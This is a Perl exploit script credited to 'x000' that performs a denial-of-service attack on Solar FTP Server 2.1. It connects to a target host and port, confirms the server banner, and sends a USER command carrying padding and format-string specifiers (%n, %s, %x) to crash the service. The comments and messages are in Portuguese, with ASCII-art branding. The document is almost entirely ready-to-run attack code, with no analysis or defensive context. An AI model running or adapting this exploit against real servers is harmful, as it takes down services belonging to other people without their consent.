#!/usr/bin/perl # #[+]Exploit Titulo: Exploit Denial of Service Solar FTP 2.1 #[+]Date: 21/10/2011 #[+]Author: x000 #[+]Version: 2.1 #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN #[+]CVE: N/A # # xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx # xxxxx xxx xxx xxx xxx xxx xxx xxxxxx # xxx xxx xxx xxx xxx xxx xxx xxxxxxxx xxxxxxxx xxxxxxxxx # xxxxxx xxx xxx xxx xxx xxx xxx xx xx xx xx xx # xxx xxx xxx xxx xxx xxx xxx xxx xx xx xx xxxx xx xxxxx # xxx xxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxxxxxxxxxxxx xxx xxxxxxxx xx xx xx xx # xxx xxx xxxxxxxxxxx xxxxxxxxxxx xxxxxxxxxxx xxx xxxxxx xx xx xxxxxxxxx # # # # Link de Download: http://solarftp.com/files/solarftps-setup.exe # # .: Criador by: x000 :. # 3d3n@hotmail.com.br # www.x000.org # Obrigado C4SS!0 G0M3S Friends Forever # use Socket; use IO::Socket; use strict; use warnings; my $sys = `ver`; if($sys=~/Windows/){ system("cls"); system("color 4f"); } else{ system("clear"); } sub usage{ print q { 00 00 000000 000000 000000 00 00 00000000 00000000 00000000 0000 0 0 0 0 0 0 0000 0 0 0 0 0 0 00 00 00000000 00000000 00000000 00 00 000000 000000 000000 | Criador x000 | | Contato: 3d3n@hotmail.com.br | | From Brazil | | Site www.x000.org | }; } if($#ARGV!=1){ usage; print "\t\t[-]Modo de Uso: perl $0 \n"; print "\t\t[-]Exemplo:perl $0 192.168.1.12 21\n"; exit; } usage; print "\t\t[+]Conectando ao Servidor $ARGV[0]...\n\n"; sleep(1); my $exploit = "A" x 50; $exploit = $exploit."%x%lf%f%d%c%s%c%u%n%s%c%lf%tt%d%c"; my $sock = IO::Socket::INET->new( PeerAddr=>$ARGV[0], PeerPort=>int($ARGV[1]), Timeout=>1, Proto=>"tcp", )or die("ERRO:\n$!\n"); print "\t\t[+]Checando se o Servidor e Vulneravel\n\n"; sleep(1); $sock->recv(my $data,2000); unless($data=~/Solar FTP Server/){ print "\t\t[+]Servidor Nao e Vulneravel:(\n\n"; sleep(1); exit; } print "\t\t[+]Servidor Vulneravel:)\n\n"; sleep(1); print "\t\t[+]Enviando Exploit Denial of Service\n\n"; sleep(1); $sock->send("USER $exploit\r\n"); close($sock); print "\t\t[+]Exploit Denial Of Service Enviado:)\n"; # x000.org